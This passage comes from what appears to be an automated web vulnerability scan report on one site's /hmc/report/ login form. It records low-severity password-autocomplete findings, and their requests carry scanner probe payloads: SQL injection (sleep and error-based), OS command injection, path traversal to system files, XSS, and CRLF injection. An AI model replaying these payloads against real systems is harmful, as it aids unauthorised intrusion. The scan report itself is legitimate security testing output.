Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1)%3BSELECT%20pg_sleep(25)--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.9. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=http://netsparker.com/n

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=http://netsparker.com/n HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=http://netsparker.com/n" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.10. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%26expr+268409241%20-%202%20%26%22

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%22%26expr+268409241%20-%202%20%26%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%26expr+268409241%20-%202%20%26%22" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.11. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%26ping%20-c%2026%20127.0.0.1%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%26ping%20-c%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:44 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%26ping%20-c%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.12. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=%00%27%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00000f)%3c%2fscript%3e

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/?nsextt=%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00000F)%3C%2Fscript%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:40 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<body onLoad="document.form1.j_username.focus();" link="#666666" vlink="#666666" alink="#666666">

<form name="form1" action="/hmc/report/index.cfm?nsextt=%00%27%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00000f)%3c%2fscript%3e" method="post">

<p>
...[SNIP]...
<td><input name="j_password" type="password" tabindex="2" title="Password" size="25" maxlength="25" onKeyPress="checkEnter();"></td>
...[SNIP]...

17.13. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=ping%20-n%2026%20127.0.0.1%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.14. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27%26%20SET%20%2FA%200xFFF9999-2%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%27%26%20SET%20%2FA%200xFFF9999-2%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:36 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:36 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27%26%20SET%20%2FA%200xFFF9999-2%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.15. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.16. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDBEKTwvc2NyaXB0Pg%3d%3d

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDBEKTwvc2NyaXB0Pg%3d%3d HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:40 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:40 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=data%3A%3Bbase64%2CJyI%2bPHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMDBEKTwvc2NyaXB0Pg%3d%3d" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.17. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='%3E%3Cnet%20sparker=netsparker(0x000022)%3E

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register='%3E%3Cnet%20sparker=netsparker(0x000022)%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:45 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='%3E%3Cnet%20sparker=netsparker(0x000022)%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.18. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-111)%20OR%20SLEEP(25)=0%20LIMIT%201--+

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=-111)%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-111)%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.19. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%26%20ping%20-n%2026%20127.0.0.1%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%26%20ping%20-n%2026%20127.0.0.1%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.20. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=../../../../../../../../../../boot.ini HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../boot.ini" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.21. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%0D%0Ans:netsparker056650=vuln

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%0D%0Ans:netsparker056650=vuln HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%0D%0Ans:netsparker056650=vuln" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.22. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=../../../../../../../../../../proc/self/version HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.23. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00000A)%3C%2Fscript%3E

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00000A)%3C%2Fscript%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:39 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=1%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x00000A)%3C%2Fscript%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.24. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%22%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%22

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=%22%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%22 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%22%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%22" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.25. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=javascript:netsparker(0x00002e)

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/?nsextt=javascript:netsparker(0x00002E) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30f0eb525229456582
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
